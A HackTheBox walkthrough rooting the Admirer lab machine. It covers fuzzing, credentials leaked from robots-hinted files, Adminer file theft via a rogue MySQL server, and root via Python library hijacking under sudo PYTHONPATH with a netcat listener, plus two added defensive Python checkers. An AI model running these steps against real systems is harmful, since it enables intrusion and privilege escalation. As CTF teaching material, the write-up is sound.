Admirer HackTheBox WalkThrough
This is the Admirer HackTheBox walkthrough. In this writeup, I have demonstrated step by step how I rooted the Admirer HackTheBox machine. First, a little about the machine: it is a Linux machine with IP address 10.10.10.187 and a difficulty of easy assigned by its maker.
Before starting, connect your PC to the VPN and confirm connectivity with the Admirer machine by pinging the IP 10.10.10.187. If all is well, start hacking. As usual, I started by scanning the box. Scanning gives an idea of how to proceed further: it helps in banner grabbing the services running on the open ports, and sometimes in vulnerability scanning. Nmap (a port scanner) gave the following result:
Scanning
$ nmap -sV -sC -oN admirer_scan 10.10.10.187
Nmap revealed that ports 21, 22 and 80 are open: vsftpd on port 21, SSH on port 22 and the Apache2 web server on port 80. I searched for public exploits for vsftpd 3.0.3 with the searchsploit tool, but none exists for this version of vsftpd. I tried anonymous FTP login with the credentials anonymous : anonymous, but the login failed. I left it there and moved on to further enumeration. Port 80 is open, so there may be a website hosted on the Apache2 web server running on that port. Going to the URL http://10.10.10.187/, I got a web page containing many images.
I tried to enumerate more on this page but found no hint; even the page source gave nothing to go on. Checking the robots.txt file revealed a disallowed folder named admin-dir and a user named waldo. I added this user to my notes as a potential username. The robots.txt file also hinted at contacts and creds files inside admin-dir.
As soon as I had these hints about the important files, I fuzzed for them, assuming they might be text files.
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt --sc 200 -u http://10.10.10.187/admin-dir/FUZZ.txt -t 50
Fuzzing revealed contacts.txt and credentials.txt. These files are present at http://10.10.10.187/admin-dir/contacts.txt and http://10.10.10.187/admin-dir/credentials.txt respectively.
Both files contain many credentials along with lots of potential usernames and passwords. The useful credential for us is the FTP account, because port 21 is open with an FTP server running on it. The FTP credential is ftpuser : %n?4Wz}R$tTF7.
Login to FTP Account
$ ftp 10.10.10.187
~ftpuser
~%n?4Wz}R$tTF7
Got two files, dump.sql and html.tar.gz, inside the FTP directory. I downloaded them to my local machine with the mget FTP command to enumerate them further.
ftp> ls
ftp> mget dump.sql html.tar.gz
//To download both files to local machine
ftp> pwd
After enumerating the contents of all the downloaded files, I got some useful information, listed below.
Got the database name from the dump.sql file.
Got the database username and password from the db_admin.php file.
Database: admirerdb
Username: waldo
Password: Wh3r3_1s_w4ld0?
We have a database credential, but port 3306 is not open on the Admirer machine, so we cannot connect to the database remotely. For now the database credential seems useless. After reading the contents of db_admin.php more carefully, I got a hint from this comment:
// TODO: Finish implementing this or find a better open source alternative.
I then tried fuzzing for file names under utility-scripts with wfuzz, using the extensions php, txt and html.
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Fuzzing listed three files, namely adminer.php, info.php and phptest.php. Going to the URL http://10.10.10.187/utility-scripts/adminer.php, I found the login panel of Adminer (a remote database administration tool written in PHP, similar to phpMyAdmin) along with the installed version of the Adminer software, which is 4.6.2. As soon as I had the software name and version, I searched for a public exploit. Googling admirer 4.6.2 exploit gave this article on the very first page of the search results. For more info on how this vulnerability works, read the above article. A snippet on 'how this exploit works' is attached below.
To exploit this vulnerability I did the following things: –
Configure MySQL Server
1. Installed the MySQL server on my local machine (MySQL is present in Kali by default). On other distros, use the command below to install it.
$apt install default-mysql-server
2. Started MySQL service
$systemctl start mysql
3. Logged in to the MySQL server with the default root credential: username root and a blank password.
$mysql -u'root'
4. Created a new user dkm that is allowed to connect to this server from any host.
MariaDB [(none)]> CREATE USER 'dkm'@'%' IDENTIFIED BY 'mypassword';
5. Granted all privileges on all databases to the user dkm.
MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'dkm'@'%';
6. Reload all privileges.
MariaDB [(none)]> FLUSH PRIVILEGES;
7. Created a database admirer and a table test inside it.
MariaDB [(none)]> create database admirer;
MariaDB [(none)]> use admirer;
MariaDB [admirer]> create table test(name varchar(255));
MariaDB [admirer]> exit;
8. Allowed remote hosts to connect to this SQL server by changing the bind address from 127.0.0.1 to 0.0.0.0 in the file 50-server.cnf in the directory /etc/mysql/mariadb.conf.d/.
9. Restarted the MySQL server to apply the changes.
$systemctl restart mysql
10. Confirmed connectivity to the server by logging in with the user dkm and the password mypassword.
$mysql -u'dkm' -p'mypassword' -h localhost
11. At last, logged in to the Adminer login panel with the credentials of the newly created user.
Logged in to my MySQL server through the Adminer login panel at the URL http://10.10.10.187/utility-scripts/adminer.php using the following details:
System: MySQL
Server: 10.10.14.14 (my tun0 IP)
Username: dkm
Password: mypassword
Database: admirer
After login, select the SQL command option in the left pane. Enter the following command to load the index.php file and click Execute.
load data local infile '../index.php'
into table test
fields terminated by "/n"
For more info about load data
, you can read here.
After the command executes successfully, click select in the left pane to list the content of the loaded file. After loading index.php, I got the following contents; a snippet is given below.
From the above file I extracted the credential waldo : &<h5b~yK3F#{PaPB&dA}{H>
According to the above file, this credential is for accessing the admirer database. However, no port is listening for database connections (confirmed through the nmap scan), so I tried this credential to log in to the SSH account of user waldo and successfully logged in. This worked because the database password was reused for the system account.
Gaining User Access
$ ssh waldo@10.10.10.187
~&<h5b~yK3F#{PaPB&dA}{H>
$ whoami && id
Capture User Flag
$cat user.txt
Privilege Escalation
Finding PrivEsc Vector
The sudo -l command revealed that:
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
In other words, user waldo may run the admin_tasks.sh script as root.
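As an added defensive check (not part of the original walkthrough): a small Python audit that parses sudo -l output in the format shown above and flags entries carrying the SETENV tag, since with env_reset in effect that tag is what lets the caller hand an arbitrary PYTHONPATH to the privileged script. The sample output below is constructed; only its first entry mirrors the Admirer box.

```python
import re

# Constructed sample of `sudo -l` output. The SETENV line is the shape seen on
# the Admirer box; the other two entries are made up to exercise the parser.
SAMPLE_SUDO_L = """\
Matching Defaults entries for waldo on admirer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
    (root) NOPASSWD: /usr/bin/systemctl status apache2
    (ALL : ALL) ALL
"""

# One privilege line: "(runas_user[ : runas_group]) [TAG: ...] command"
ENTRY_RE = re.compile(
    r"^\s*\((?P<user>[^:)]+?)\s*(?::\s*(?P<group>[^)]+?)\s*)?\)\s+"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def parse_sudo_l(text):
    """Return the command entries of `sudo -l` output as dicts; header and Defaults lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        entries.append({
            "runas_user": m.group("user"),
            "runas_group": m.group("group"),
            "tags": tags,
            "command": m.group("cmd"),
        })
    return entries


def risky_entries(entries):
    """Flag entries where the invoking user controls the privileged command's environment or choice."""
    findings = []
    for e in entries:
        reasons = []
        if "SETENV" in e["tags"]:
            # SETENV exempts VAR=value arguments from env_reset, so PYTHONPATH reaches the script.
            reasons.append("SETENV lets the caller override env_reset for this command")
        if e["command"] == "ALL":
            reasons.append("unrestricted command")
        if reasons:
            findings.append((e["command"], reasons))
    return findings
```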
Since user waldo can run the admin_tasks.sh script with root privilege, every file or command executed inside this script also runs with root privilege. The function backup_web() inside admin_tasks.sh calls the backup.py file in the /opt/scripts/ directory, so when we execute admin_tasks.sh, backup.py is also executed as root. Because backup.py imports the shutil library, there is a chance of Python library hijacking. So here our privilege escalation vector can be Python library hijacking. Check this article for more info about PLH.
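As an added example (not part of the original walkthrough): Python code that shows why PYTHONPATH hijacking works and gives a check a defender can run against the imports of a privileged script. It resolves a module the way the interpreter would with a given PYTHONPATH and flags a stdlib name such as shutil that would load from outside the standard library; the decoy shutil.py it creates in a temporary directory is constructed for the demo and removed afterwards.

```python
import importlib.machinery
import os
import sys
import sysconfig
import tempfile

# Directories the standard library legitimately lives in (pure-Python and platform parts).
STDLIB_DIRS = tuple(
    os.path.realpath(sysconfig.get_paths()[k]) + os.sep for k in ("stdlib", "platstdlib")
)


def resolve_origin(module, extra_path=()):
    """Return the file `module` would be loaded from if PYTHONPATH held `extra_path`.

    PYTHONPATH entries are placed before the standard library on sys.path, which
    is why a writable directory named there can shadow a stdlib module. PathFinder
    is queried directly so the lookup ignores modules that are already imported.
    """
    search = list(extra_path) + [p for p in sys.path if p]
    spec = importlib.machinery.PathFinder.find_spec(module, search)
    return os.path.realpath(spec.origin) if spec and spec.origin else None


def is_shadowed(module, extra_path=()):
    """True when a stdlib module would resolve to a file outside the stdlib directories."""
    origin = resolve_origin(module, extra_path)
    return origin is not None and not origin.startswith(STDLIB_DIRS)


def demo():
    """Constructed scenario: a decoy shutil.py in a user-writable directory."""
    with tempfile.TemporaryDirectory() as hijack_dir:
        with open(os.path.join(hijack_dir, "shutil.py"), "w") as f:
            f.write("# constructed decoy; a privileged script must never import this\n")
        return {
            "clean": is_shadowed("shutil"),                      # False: real stdlib copy
            "with_pythonpath": is_shadowed("shutil", [hijack_dir]),  # True: decoy wins
            "decoy_origin": resolve_origin("shutil", [hijack_dir]),
        }


if __name__ == "__main__":
    print(demo())
```

Running the same check with the PYTHONPATH a sudo rule lets a user set, against every name a root-run script imports, tells you whether that script is exposed before anyone tries it.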
Content of the backup.py file:
To perform Python library hijacking and get a root shell, I did the following:
Started a Netcat listener in one terminal
$nc -nvlp 1234
and ran the following commands in another terminal
$ mkdir /tmp/ethicalhacs
$ nano /tmp/ethicalhacs/shutil.py
$ cat /tmp/ethicalhacs/shutil.py
$ sudo PYTHONPATH=/tmp/ethicalhacs /opt/scripts/admin_tasks.sh
~Choose an option: 6
We can see that we have successfully escalated privileges to root by Python library hijacking.
Capture Root Flag
$cat /root/root.txt
This was how I rooted the Admirer HackTheBox machine. Thanks for reading this walkthrough. I learnt a lot from rooting this box, and I hope you have also learnt something new. Feel free to share your experience in the comment section. For any query or suggestion related to the walkthrough, feel free to write to us at [email protected].